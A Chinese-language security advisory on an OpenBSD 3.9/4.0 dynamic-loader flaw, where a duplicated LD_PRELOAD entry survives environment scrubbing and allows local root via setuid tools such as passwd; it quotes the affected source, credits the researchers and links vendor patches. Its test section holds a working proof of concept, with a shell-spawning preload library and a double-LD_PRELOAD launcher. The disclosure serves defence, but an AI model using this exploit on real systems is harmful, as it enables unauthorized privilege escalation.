安全研究
安全漏洞
OpenBSD ld.so本地环境变量继承漏洞
发布日期:2006-11-20
更新日期:2006-11-23
受影响系统:
OpenBSD OpenBSD 4.0描述:
OpenBSD OpenBSD 3.9
BUGTRAQ ID: 21188
OpenBSD是一款开放源代码Unix类操作系统。
OpenBSD动态加载器在处理环境变量的继承时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。
OpenBSD动态加载器清除了环境变量,但由于逻辑问题,_dl_unsetenv()可能会被相邻的两项欺骗。
漏洞相关的代码如下:
/src/libexec/ld.so/loader.c:
--------------
if (_dl_issetugid()) { /* Zap paths if s[ug]id... */
...
if (_dl_preload) {
_dl_preload = NULL; (*)
_dl_unsetenv("LD_PRELOAD", envp);
}
---------------
由于变量已被清除,因此不允许直接执行代码。但参数会出现在特权进程的环境中,如果特权进程在执行其他程序之前将其真正的uid设置为等同于有效uid的话,就可能导致权限提升,因为issetugid()检查会返回0。然后就可能加载攻击者所选择的共享库。
OpenBSD的默认ch*/chpass/passwd工具也存在类似问题。
src/usr.bin/passwd/local_passwd.c:
---------------
/* Drop user's real uid and block all signals to avoid a DoS. */
setuid(0);
sigfillset(&fullset);
sigdelset(&fullset, SIGINT);
sigprocmask(SIG_BLOCK, &fullset, NULL);
...
if (pw_mkdb(uname, pwflags) < 0)
pw_error(NULL, 0, 1);
...
----------------
src/lib/libutil/passwd.c
-----------------------
int
pw_mkdb(char *username, int flags)
....
execv(_PATH_PWD_MKDB, av);
-----------------------
上述pw_mkdb()函数未经过滤环境便执行/usr/sbin/pwd_mkdb。由于/usr/bin/passwd二进制程序运行root-user suid,因此可能导致本地root用户入侵。
<*来源:Justin Schuh
Mark Dowd
John McDonald
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116423446823664&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-------------
vulnerable root-suid program example:
main()
{
setuid(0);
execl("/usr/bin/id","id",0);
}
evil shared library:
__attribute__ ((constructor)) main()
{
printf("[+] Hello from shared library land\n");
execle("/bin/sh","sh",0,0);
}
openbsd _dl_unsetenv bypass:
#define LIB "LD_PRELOAD=/tmp/lib.so"
main(int argc, char *argv[])
{
char *e[] = { LIB, LIB, 0 };
int i; for(i = 0; argv[i]; argv[i] = argv[++i]); /* inspired by
_dl_unsetenv (: */
execve(argv[0], argv, e);
}
建议:
厂商补丁:
OpenBSD
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/common/005_ldso.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.9/common/016_ldso.patch
浏览次数:3371
严重程度:0(网友投票)
绿盟科技给您安全的保障
